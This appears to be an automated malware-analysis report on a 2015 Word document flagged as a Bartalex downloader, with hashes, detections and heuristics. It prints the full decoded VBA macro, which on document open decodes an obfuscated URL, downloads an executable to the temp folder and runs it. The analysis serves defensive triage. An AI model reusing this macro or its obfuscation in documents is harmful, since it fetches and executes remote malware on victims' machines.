Office (OLE) malware analysis — malicious · b677f0fcc8c39c6c

MALICIOUS

Office (OLE)

111.0 KB Created: 2015-07-08 15:41:00 Authoring application: Microsoft Office Word First seen: 2015-09-19

MD5: 14fad0cfcecadf7e6cd8ca43a733cd50 SHA-1: 90a8f5a965de627d5b75387dc644bda297cc0b23 SHA-256: b677f0fcc8c39c6ce97b3da7db86b4a9e8ca7bac850a04b7f3d85716e52059bf

278 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains VBA macros that utilize the URLDownloadToFileA API to download a file from a remote location. It also references ShellExecuteA, indicating an intent to execute the downloaded content. The ClamAV detection name 'Doc.Downloader.Bartalex-6755229-0' further supports its role as a downloader.

Heuristics 9

ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2825 bytes
SHA-256: `84641e9e6a71780b5fe9a28e93f0aaf4543620e854090223cec17baa96b1b3ec`
Detection ClamAV: No threats found Obfuscation or payload: likely 32 of 54 identifiers look randomly generated (e.g. 'oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLG') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Macro Name: UuUgZspLiGyuGWmHvEcWACjDIQFmu Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32.dll" Alias "ShellExecuteA" (ByVal efdiSLTxKJZegXxMEpWYtVbpzThUHiEDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal ACjDIQFmuvtyVdkNbZquxoNdUFnpKnrFBkyXXyHTwP As String, ByVal vSlKlwqIrOyIOKWnCJLUsnQSz As String, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRBAooPX As String, ByVal kMgLjBNBztLIfOZfbnEFbclJqTj As Long) As Long Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long Dim oAOwNzDeRPJcYvRqvsDGVr As String, sBLGkzSmFApUefdiSLTxKJ As String, ZegXxMEpWYtVbpzThUHiEDgMeQ As String, vtyVdkNbZquxoNdUFnpKnrFBkyXXy As String, HTwPvSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxw As String, BmtAQrrGwzrPtXVDsMDuHRBAooPXkM As String, vSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxwBm As String, tAQrrGwzrPtXVDsMDuHRBAooPXkMgLjBNBztLIfOZfbnEFbcl As String Private Function gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe) Dim fdiSLTxKJZegXxMEpWYtVbpz, ThUHiEDgMeQUuUgZspLiGyuGWm, HvEcWACjDIQFmuvtyVdkNb y = Len(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe) For x = y To 1 Step -1 JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo = Mid(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe, x, 1) AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef = AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef & JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo Next For ThUHiEDgMeQUuUgZspLiGyuGWm = 1 To Len(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef) fdiSLTxKJZegXxMEpWYtVbpz = Mid(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef, ThUHiEDgMeQUuUgZspLiGyuGWm, 1) HvEcWACjDIQFmuvtyVdkNb = HvEcWACjDIQFmuvtyVdkNb & Chr(Asc(fdiSLTxKJZegXxMEpWYtVbpz) - 1) Next gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ = HvEcWACjDIQFmuvtyVdkNb End Function Private Sub UuUgZspLiGyuGWmHvEcWACjDIQFmu() NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0 GFNGhdrghsDFBDFgbdgF 0, "open", Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), "", vbNullString, vbNormalFocus End Sub Private Sub Document_Open() UuUgZspLiGyuGWmHvEcWACjDIQFmu End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.